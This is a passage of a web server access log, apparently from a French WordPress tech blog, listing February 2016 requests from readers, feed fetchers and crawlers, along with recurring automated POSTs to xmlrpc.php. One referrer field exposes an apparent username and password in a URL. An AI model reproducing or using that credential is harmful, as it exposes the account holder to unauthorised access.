\"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [09/Feb/2016:20:57:26 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 438 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:20:57:30 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:20:57:30 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:20:57:30 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [09/Feb/2016:20:57:30 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [09/Feb/2016:20:57:33 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [09/Feb/2016:20:57:33 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [09/Feb/2016:20:57:33 -0800] \"GET /wp-content/uploads/2015/02/photo-7.jpg HTTP/1.1\" 200 95455 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [09/Feb/2016:20:57:33 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n130.0.236.153 - - [09/Feb/2016:21:00:36 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n95.211.134.37 - - [09/Feb/2016:21:05:12 -0800] \"GET / HTTP/1.1\" 200 33373 \"-\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\"\n62.210.250.66 - - [09/Feb/2016:21:08:30 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:21:12:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n178.255.215.65 - - [09/Feb/2016:21:15:40 -0800] \"GET / HTTP/1.1\" 301 359 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n162.243.175.218 - - [09/Feb/2016:21:18:39 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n94.199.151.22 - - [09/Feb/2016:21:19:32 -0800] \"GET / HTTP/1.1\" 301 359 \"-\" \"Wotbox/2.01 (+http://www.wotbox.com/bot/)\"\n62.210.250.66 - - [09/Feb/2016:21:22:59 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:21:23:54 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.103.160 - - [09/Feb/2016:21:28:09 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n45.55.229.91 - - [09/Feb/2016:21:32:10 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\"\n45.55.229.91 - - [09/Feb/2016:21:32:16 -0800] \"GET /category/usa/ HTTP/1.1\" 200 7480 \"http://marryme-bridal.ru\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\"\n45.55.229.91 - - [09/Feb/2016:21:32:17 -0800] \"GET /category/portraits/ HTTP/1.1\" 200 7341 \"http://marryme-bridal.ru\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36\"\n198.58.102.117 - - [09/Feb/2016:21:36:14 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:21:38:37 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n45.55.229.154 - - [09/Feb/2016:21:38:39 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7369 \"http://techmeup.co\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0\"\n45.55.229.154 - - [09/Feb/2016:21:38:39 -0800] \"GET /category/nouvelles/ HTTP/1.1\" 200 6137 \"http://techmeup.co\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\"\n45.55.229.154 - - [09/Feb/2016:21:38:40 -0800] \"GET /author/julienbarbier/ HTTP/1.1\" 200 6856 \"http://techmeup.co\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\"\n45.55.229.154 - - [09/Feb/2016:21:38:42 -0800] \"GET /le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/ HTTP/1.1\" 200 9071 \"http://techmeup.co\" \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\"\n45.55.229.154 - - [09/Feb/2016:21:38:42 -0800] \"GET /author/laetitia/ HTTP/1.1\" 200 7337 \"http://techmeup.co\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie/ HTTP/1.1\" 200 9283 \"http://images.google.fr/imgres?imgurl=https%3A%2F%2F31.media.tumblr.com%2F5dd4eb54ddb4773345909f4c689dcba9%2Ftumblr_inline_n7zuk0v8WY1sa6hof.jpg&imgrefurl=http%3A%2F%2Ftechmeup.co%2Fadrien-duermael-pixowl-et-lindustrie%2F&h=500&w=500&tbnid=Rr1UNiaOw3L2dM%3A&docid=rUfxw3nWObId4M&ei=Gsy6Vq6EHcaNav_LnsgJ&tbm=isch&iact=rc&uact=3&dur=663&page=1&start=0&ndsp=32&ved=0ahUKEwiu-fvmvOzKAhXGhhoKHf-lB5kQrQMIITAA\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n6zszkBuTQ1sa6hof-50x50.jpg HTTP/1.1\" 200 2059 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:42:06 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:21:42:01 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n89.2.182.139 - - [09/Feb/2016:21:43:46 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:21:45:26 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:21:47:34 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:21:50:28 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.49 - - [09/Feb/2016:21:53:14 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n141.8.132.38 - - [09/Feb/2016:21:56:01 -0800] \"GET /robots.txt HTTP/1.1\" 200 383 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n141.8.132.38 - - [09/Feb/2016:21:56:09 -0800] \"GET / HTTP/1.1\" 200 7273 \"-\" \"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\"\n199.119.124.38 - - [09/Feb/2016:21:58:18 -0800] \"GET /rss HTTP/1.1\" 301 418 \"-\" \"Mozilla/5.0 (compatible; theoldreader.com; 1 subscribers; feed-id=e020a4234ced4329fa4063c1)\"\n198.58.103.102 - - [09/Feb/2016:22:01:10 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:22:05:01 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:07:52 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:10:44 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:13:34 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n180.76.15.142 - - [09/Feb/2016:22:19:15 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n167.114.173.221 - - [09/Feb/2016:22:21:13 -0800] \"GET /post/90455136503 HTTP/1.1\" 404 4872 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n62.210.250.66 - - [09/Feb/2016:22:22:17 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:22:28:43 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:31:37 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:34:34 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.250.66 - - [09/Feb/2016:22:38:14 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:22:43:24 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:22:46:26 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n78.194.25.109 - - [09/Feb/2016:22:51:21 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n78.194.25.109 - - [09/Feb/2016:22:51:21 -0800] \"GET /favicon.ico HTTP/1.1\" 200 238 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n198.58.102.155 - - [09/Feb/2016:22:53:20 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.250.66 - - [09/Feb/2016:22:56:32 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [09/Feb/2016:23:02:36 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.142.23 - jez [09/Feb/2016:23:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n67.169.93.143 - - [09/Feb/2016:23:08:51 -0800] \"HEAD /apple-touch-icon.png HTTP/1.1\" 404 448 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n92.222.20.166 - - [09/Feb/2016:23:10:37 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n130.0.236.153 - - [09/Feb/2016:23:13:08 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.250.66 - - [09/Feb/2016:23:15:01 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n81.67.77.161 - - [09/Feb/2016:23:16:23 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Twitter for iPhone\"\n81.67.77.161 - - [09/Feb/2016:23:16:23 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Twitter for iPhone\"\n180.76.15.158 - - [09/Feb/2016:23:19:40 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n207.46.13.153 - - [09/Feb/2016:23:23:57 -0800] \"GET /index.php?controller=product&id_product=713 HTTP/1.1\" 301 436 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n130.0.236.153 - - [09/Feb/2016:23:24:58 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n80.12.55.130 - - [09/Feb/2016:23:27:52 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15535 \"-\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n199.16.156.125 - - [09/Feb/2016:23:27:56 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:23:27:59 -0800] \"GET /wp-content/uploads/2015/03/Photo-Bio-2013-300x300.jpg HTTP/1.1\" 200 24023 \"-\" \"Twitterbot/1.0\"\n80.12.55.130 - - [09/Feb/2016:23:28:16 -0800] \"GET /les-francais-genies-de-la-silicon-valley HTTP/1.1\" 301 436 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:28:21 -0800] \"GET /les-francais-genies-de-la-silicon-valley/apple-touch-icon.png HTTP/1.1\" 404 4871 \"http://techmeup.co/les-francais-genies-de-la-silicon-valley/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:29:48 -0800] \"GET /wp-content/uploads/2015/03/Photo-Bio-2013-300x225.jpg HTTP/1.1\" 200 18765 \"http://techmeup.co/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:29:48 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-300x225.jpeg HTTP/1.1\" 200 9485 \"http://techmeup.co/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:29:48 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x225.jpg HTTP/1.1\" 200 32895 \"http://techmeup.co/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:30:10 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n7zuk0v8WY1sa6hof-50x50.jpg HTTP/1.1\" 200 2287 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n80.12.55.130 - - [09/Feb/2016:23:30:27 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4871 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; Android 5.1.1; Build/LYZ28N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36\"\n91.224.140.223 - - [09/Feb/2016:23:32:02 -0800] \"GET / HTTP/1.1\" 200 33373 \"-\" \"GuzzleHttp/6.1.0 curl/7.29.0 PHP/5.6.14\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6228 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-300x225.jpg HTTP/1.1\" 200 16230 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-300x225.jpg HTTP/1.1\" 200 9568 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.224.121.226 - - [09/Feb/2016:23:34:41 -0800] \"GET /wp-content/uploads/2015/02/photo-7-300x225.jpg HTTP/1.1\" 200 17363 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n192.99.150.96 - - [09/Feb/2016:23:36:19 -0800] \"GET /feed/ HTTP/1.1\" 200 63952 \"-\" \"Filterly3-Argotic-Syndication-Framework/2008.0.2.0\"\n213.136.71.211 - - [09/Feb/2016:23:39:51 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n162.243.175.231 - - [09/Feb/2016:23:42:11 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n209.133.111.211 - - [09/Feb/2016:23:43:42 -0800] \"GET /feed/ HTTP/1.1\" 200 20931 \"-\" \"rogerbot/1.0 (http://www.moz.com/dp/rogerbot, rogerbot-crawler@moz.com)\"\n62.210.250.66 - - [09/Feb/2016:23:48:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n130.0.236.153 - - [09/Feb/2016:23:51:35 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n207.46.13.29 - - [09/Feb/2016:23:55:31 -0800] \"GET /adrien-duermael-pixowl-et-lindustrie/ HTTP/1.1\" 200 9315 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n130.0.236.153 - - [09/Feb/2016:23:57:24 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.250.66 - - [10/Feb/2016:00:00:34 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n66.220.158.112 - - [10/Feb/2016:00:04:39 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-200x300.jpg HTTP/1.1\" 200 16096 \"-\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n62.210.250.66 - - [10/Feb/2016:00:06:44 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n82.237.33.174 - - [10/Feb/2016:00:07:10 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.1.56 CFNetwork/760.0.5 Darwin/15.0.0 (x86_64)\"\n82.237.33.174 - - [10/Feb/2016:00:07:23 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.1.56 CFNetwork/760.0.5 Darwin/15.0.0 (x86_64)\"\n62.210.250.66 - - 